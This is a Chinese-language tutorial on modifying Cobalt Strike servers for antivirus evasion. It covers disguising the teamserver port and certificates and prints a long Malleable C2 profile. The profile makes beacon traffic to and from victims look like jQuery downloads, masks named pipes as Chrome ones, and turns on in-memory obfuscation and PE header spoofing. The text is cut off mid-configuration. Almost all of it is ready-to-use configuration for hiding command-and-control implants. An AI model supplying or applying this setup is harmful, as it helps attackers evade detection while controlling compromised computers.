CS免杀之02特征修改
修改特征是针对cs服务端进行特征的修改 , 客户端不需要修改
牢记 : cs服务器需要的时候再开启, 平常不需要的时候就关闭
修改默认端口
vim teamserver
只需要修改最后一行的 -Dcobaltstrike.server_port , 可以是 80 , 443 , 3389 , 8080, 8443等常见端口伪装成正常的web服务
-Dcobaltstrike.server_port=8080
修改默认证书
-Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=0123456
生成自签证书
keytool -keystore ./cobaltstrike.store -storepass 0123456 -keypass 0123456 -genkey -keyalg RSA -alias Pwn3rs -dname "CN=Pwn3rs Striked, OU=AdvancedReversing, O=Pwn3rs, L=Around, S=Over, C=There"
使用颁发的证书(推荐)
teamserver 可直接读取 jks 格式的书,将证书文件直接重命名为 cobaltstrike.store 的文件即可
mv server.jks cobaltstrike.store
pem格式
pem --> p12 --> jks , 然后在teamserver中配置
openssl pkcs12 -export -in certificate.pem -inkey privatekey.pem -out temp.p12 -name myalias -passout pass:[P12密码] && \
keytool -importkeystore -srckeystore temp.p12 -srcstoretype PKCS12 -destkeystore keystore.jks -deststoretype JKS -srcstorepass [P12密码] -deststorepass [JKS密码] -destkeypass [JKS密码]
myalias 为想要的别名
crt格式
keytool -import -trustcacerts -alias mykey -file domain.crt -keystore domain.store
配置profile文件
cs中默认是没有 profile文件 的, 需要自己配置, 而且官网称profile文件为 Malleablec2 , 整个profile 文件的配置就是进行流量上的伪装, 防溯源,免杀, 把命令的下发和结果的回传进行伪装 , 让他从流量上看起来更像是在访问网页
基本语法
# this is a comment, # 是注释
# 设置全局变量, 和其他无关是cs自身的一些机制
set global_option "value";
# 协议的配置, 如: http - get, https - post等
protocol - transaction {
set local_option "value";
client {
# customize client indicators
}
server {
# customize server indicators
}
}
示例配置
以 jquery-c2.4.5-jx.profile 文件为例解释各配置项
# Malleable C2 Profile
# Version: CobaltStrike 4.5
# File: jquery-c2.4.5.profile
# Description:
# c2 profile attempting to mimic a jquery.js request
# uses signed certificates
# or self-signed certificates
# Authors: dabaige
# ===============
# === 全局变量 ===
# ===============
# 样本名
set sample_name "jQuery CS 4.5 Profile";
# 心跳包时间,单位毫秒
set sleeptime "1000"; # 45 Seconds
# 抖动,心跳包时间的波动范围 45 +- 45*37%
set jitter "50"; # % jitter
# 在响应中附加一个长度在 0-100 个字符之间的随机字符串,用于增加响应大小的的不可预测性,使CS的通信模式更难被网络监控工具所识别和分析
set data_jitter "100";
# UA头
set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";
# ===============
# === SSL 证书 ===
# ===============
https-certificate {
set C "US"; #国家
set CN "jquery.com";
set O "jQuery";
set OU "Certificate Authority";
set validity "365";
set keystore "cobaltstrike.store"; # 证书文件
set password "1qazwsx"; # 证书密码
}
# ==================
# === TCP Beacon ===
# ==================
# TCP Beacon 监听端口
set tcp_port "42585";
# 帧头, 修改和伪装网络流量特征
set tcp_frame_header "\x80";
# ==================
# === SMB Beacon ===
# ==================
# smb会在横向渗透使用到
# smb 管道名
set pipename "mojo.5688.8052.183894939787088877##"; # 常见的 Chrome 命名管道
set pipename_stager "mojo.5688.8052.35780273329370473##"; # 常见的 Chrome 命名管道
# 帧头
set smb_frame_header "\x80";
# ==================
# === DNS Beacon ===
# ==================
# 不经常使用 , 但是对于只有DNS协议出网的设备可以使用
dns-beacon {
set dns_idle "74.125.196.113"; # google.com,第一次查询的地址
set dns_max_txt "252"; # 最大查询次数 , 255以下 , 能被4整除
set dns_sleep "0"; # 在每个单独的 DNS 请求之前强制休眠,毫秒为单位
set dns_ttl "5"; # ttl
set maxdns "255"; # 最大dns连接数
set dns_stager_prepend ".resources.123456."; # 使用dns协议的马,pe头追加的内容
set dns_stager_subhost ".feeds.123456."; # # 子域名的查询配置
# DNS subhosts override options, added in version 4.3
set beacon "a.bc.";
set get_A "b.1a.";
set get_AAAA "c.4a.";
set get_TXT "d.tx.";
set put_metadata "e.md.";
set put_output "f.po.";
set ns_response "zero";
}
# ==================
# === SSH Beacon ===
# ==================
# 用于横向移动的SSH伪Beacon
# SSH连接的banner信息
set ssh_banner "OpenSSH_7.4 Debian (protocol 2.0)";
# 定义用于SSH伪Beacon通信的命名管道的名称前缀,##是一个占位符
set ssh_pipename "wkssvc##";
# ==================
# === HTTP 阶段化 ===
# ==================
# 自定义 HTTP 阶段化(staging)过程的配置
# 是将第二阶段的有效 payload 传输到已经受到攻击者控制的主机上的过程
set host_stage "true"; # 启用通过HTTP、HTTPS或DNS进行阶段化的有效 payload 托管. 用于 stagers
http-stager {
set uri_x86 "/jquery-3.3.1.slim.min.js";
set uri_x64 "/jquery-3.3.2.slim.min.js";
server {
header "Server" "NetDNA-cache/2.2";
header "Cache-Control" "max-age=0, no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
header "Content-Type" "application/javascript; charset=utf-8";
output {
## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
# 2nd Line
prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
# 1st Line
prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
print;
}
}
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Accept-Language" "en-US,en;q=0.5";
#header "Host" "code.jquery.com";
header "Referer" "http://code.jquery.com/";
header "Accept-Encoding" "gzip, deflate";
}
}
# ================
# === HTTP 响应 ===
# ================
# 响应头配置
http-config {
set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";
header "Server" "Apache";
header "Keep-Alive" "timeout=10, max=100";
header "Connection" "Keep-Alive";
set trust_x_forwarded_for "true";
set block_useragents "curl*,lynx*,wget*";
}
# 命令的下发相当于是 teamserver 向受害者发送一个get请求
http-get {
set uri "/jquery-3.3.1.min.js"; # 下发命令访问的uri
set verb "GET"; # 请求方法
# 客户端配置
client {
# 请求头配置
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
#header "Host" "code.jquery.com";
header "Referer" "http://code.jquery.com/";
header "Accept-Encoding" "gzip, deflate";
# 元数据配置
metadata {
base64url;
prepend "__cfduid=";
header "Cookie";
}
}
# 服务端配置
server {
# 响应头配置
header "Server" "NetDNA-cache/2.2";
header "Cache-Control" "max-age=0, no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
header "Content-Type" "application/javascript; charset=utf-8";
# 输出信息
output {
mask;
base64url;
## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
# 2nd Line
prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
# 1st Line
prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
print;
}
}
}
# 回传相当于受害者向 teamserver 发送一个 post 请求
http-post {
# 请求地址
set uri "/jquery-3.3.2.min.js";
# 请求方法
set verb "POST";
# 客户端配置
client {
# 请求头
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
#header "Host" "code.jquery.com";
header "Referer" "http://code.jquery.com/";
header "Accept-Encoding" "gzip, deflate";
# 参数
id {
mask;
base64url;
parameter "__cfduid";
}
output {
mask;
base64url;
print;
}
}
# 服务端配置
server {
# 响应头
header "Server" "NetDNA-cache/2.2";
header "Cache-Control" "max-age=0, no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
header "Content-Type" "application/javascript; charset=utf-8";
# 输出信息
output {
mask;
base64url;
## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
# 2nd Line
prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
# 1st Line
prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
print;
}
}
}
# =============
# === stage ===
# =============
# stage ( 第二阶段的shellcode ), 用于自定义 Beacon(Cobalt Strike 的恶意软件组件)在内存中的加载方式和表现形式也就是用来自定义伪装cs自带的那些命令是如何在内存中表现的
stage {
# CS 4.2 added allocator and MZ header overrides
set allocator "VirtualAlloc"; # allocator用于设置Beacon的反射加载器(Reflective Loader)如何为代理(agent)分配内存 Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc
#set magic_mz_x86 "MZRE";
#set magic_mz_x64 "MZAR";
set magic_pe "NO"; # 是否覆盖Beacon的反射加载器使用的PE文件
set userwx "false"; # 是否要求beacon在内存中的权限可读可写可执行,rwx 的权限比较可疑
set stomppe "true"; # 要求反射加载器在加载Beacon有效载荷后覆盖MZ(Microsoft Windows Portable Executable File)头、PE头和e_lfanew值
set obfuscate "true"; # obfuscate启用对反射DLL的导入表进行混淆,覆盖未使用的头部内容,并要求反射加载器在没有DLL头的情况下将Beacon复制到新内存中
set cleanup "true"; # cleanup要求Beacon尝试释放与反射DLL包相关联的内存。
# CS 3.12 Addition "Obfuscate and Sleep"
set sleep_mask "true"; # 启用在Beacon(HTTP、SMB、TCP Beacons)在内存中睡眠或等待新连接/数据之前对其进行混淆的功能
# CS 4.1
set smartinject "true"; # 启用使用嵌入式函数指针提示来引导 Beacon 代理
# Make the Beacon Reflective DLL look like something else in memory
# Values captured using peclone agaist a Windows 10 version of explorer.exe
set checksum "0"; # 设置Beacon的PE头部中的校验和值
set compile_time "11 Nov 2016 04:08:32"; # 设置Beacon的PE头部中的编译时间
set entry_point "650688"; # 设置Beacon的PE头部中的入口点值
set image_size_x86 "4661248";
set image_size_x64 "4661248";
set name "srv.dll";
# 添加到DLL中的元信息数据
set rich_header "\x75\x92\x8d\x57\x7e\xda\xcd\x57\xf8\x85\x35\xab\x72\x6a\x6e\xee\xa2\x86\x29\x6c";
## WARNING: Module stomping
# Cobalt Strike 3.11 also adds module stomping to Beacon's Reflective Loader. When enabled, Beacon's loader will shun VirtualAlloc and instead load a DLL into the current process and overwrite its memory.
# Set module_x86 to a favorite x86 DLL to module stomp with the x86 Beacon. The module_x64 option enables this for the x64 Beacon.
# While this is a powerful feature, caveats apply! If the library you load is not large enough to host Beacon, you will crash Beacon's process. If the current process loads the same library later (for whatever reason), you will crash Beacon's process. Choose carefully.
# By default, Beacon's loader allocates memory with VirtualAlloc. Module stomping is an alternative to this. Set module_x86 to a DLL that is about twice as large as the Beacon payload itself. Beacon's x86 loader will load the specified DLL, find its location in memory, and overwrite it. This is a way to situate Beacon in memory that Windows associates with a file on disk. It's important that the DLL you choose is not needed by the applications you intend to reside in. The module_x64 option is the same story, but it affects the x64 Beacon.
# Details can be found in the In-memory Evasion video series. https://youtu.be/uWVH9l2GMw4
# set module_x64 "netshell.dll";
# set module_x86 "netshell.dll";
# The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep.
# 填充和转换Beacon的反射DLL阶段
transform-x86 { # transform the x86 rDLL stage
# 前置
prepend "\x87\xdb\x66\x87\xd2\x49\x66\x90\x87\xd2\x0f\x1f\x00\x87\xc9\x41\x66\x87\xc9\x42\x44\x0f\x1f\x00\x40\x40\x66\x87\xdb\x0f\x1f\x04\x00\x48\x46\x4c\x90\x45\x43\x47\x66\x0f\x1f\x04\x00\x0f\x1f\x00"; # prepend nops
# 字符串替换
strrep "ReflectiveLoader" "execute"; # Change this text
strrep "This program cannot be run in DOS mode" ""; # Remove this text
strrep "beacon.dll" ""; # Remove this text
}
transform-x64 { # transform the x64 rDLL stage
